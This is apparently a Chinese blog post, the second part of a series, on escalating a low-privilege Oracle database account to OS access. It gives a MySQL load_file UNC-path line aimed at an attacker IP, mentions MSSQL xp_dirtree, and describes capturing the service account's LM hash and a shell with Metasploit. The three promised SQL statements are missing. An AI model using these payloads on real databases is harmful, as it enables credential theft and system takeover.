Oracle 低权限数据库账户得到 OS 访问权限 提权利用(2)

时间:2009-06-19 17:27:00 

4.然后执行下面 3 条 SQL 语句


后来经过 pt007 的提醒,我又测试了 mysql,如果服务也是 administrator 启动的,用select load_file('\\\\192.168.1.52\mk.txt')也是可以得到系统权限的.MSSQL 应该用 xp_dirtree 存储过程 也是可以的,不过我没有配置出来用 administrator 账户启动 MSSQL 服务,希望知道的朋友指点下我。

这个技术可以用到内网 WEB 评估的时候,如果有注入,服务又是 administrator 启动的,可以提权了。

两个PDF下载,

作者:Mickey
http://dsecrg.com/files/pub/pdf/Penetration_from_application_down_to_OS_(Oracle%20database).pdf
http://54mickey.googlepages.com/Penetration_fromapplication_down_to_.pdf

当执行完 create index 这句的时候,在看咱们本地的 metasploit,就已经得到 ORACLE 数据库主机的系 统当前服务用户的 half lm 哈希和 cmdshell 了。

标签:Oracle,低权限,提权利用
0
投稿

猜你喜欢

  • python十进制转二进制的详解

    2023-06-07 23:39:33
  • python实现网站用户名密码自动登录功能

    2021-07-05 09:48:13
  • Python Django路径配置实现过程解析

    2023-11-13 20:50:02
  • web服务器程序运行出现乱码问题的解决方法

    2023-02-26 14:46:48
  • vue3和ts封装axios以及使用mock.js详解

    2024-04-28 09:27:47
  • SQL update 多表关联更新的实现代码

    2024-01-22 01:44:06
  • ORACLE应用经验(1)

    2010-07-31 12:53:00
  • 从零开始写jQuery框架

    2008-12-24 13:37:00
  • 详解字典树Trie结构及其Python代码实现

    2023-07-07 18:18:41
  • Python 面向对象编程详解

    2023-06-25 05:24:23
  • python 从远程服务器下载日志文件的程序

    2021-03-06 01:39:15
  • 零基础写python爬虫之使用urllib2组件抓取网页内容

    2021-08-16 01:13:22
  • 用户"sa"登陆失败 SQLServer 错误18456的解决方法

    2024-01-18 18:04:37
  • Python实现PDF转MP3的示例代码

    2021-08-07 21:21:06
  • 分享一个超好用的php header下载函数

    2023-09-03 21:31:43
  • MySQL创建用户与授权方法

    2024-01-19 02:43:55
  • 详解如何在Linux(CentOS)下重置MySQL根(Root)密码

    2024-01-14 08:35:27
  • Python使用 Beanstalkd 做异步任务处理的方法

    2021-01-06 18:18:19
  • 可用性测试过程中需要关注的一些细节

    2009-03-06 12:38:00
  • SQL Server序列SEQUENCE用法介绍

    2024-01-21 02:43:21
  • asp之家 网络编程 m.aspxhome.com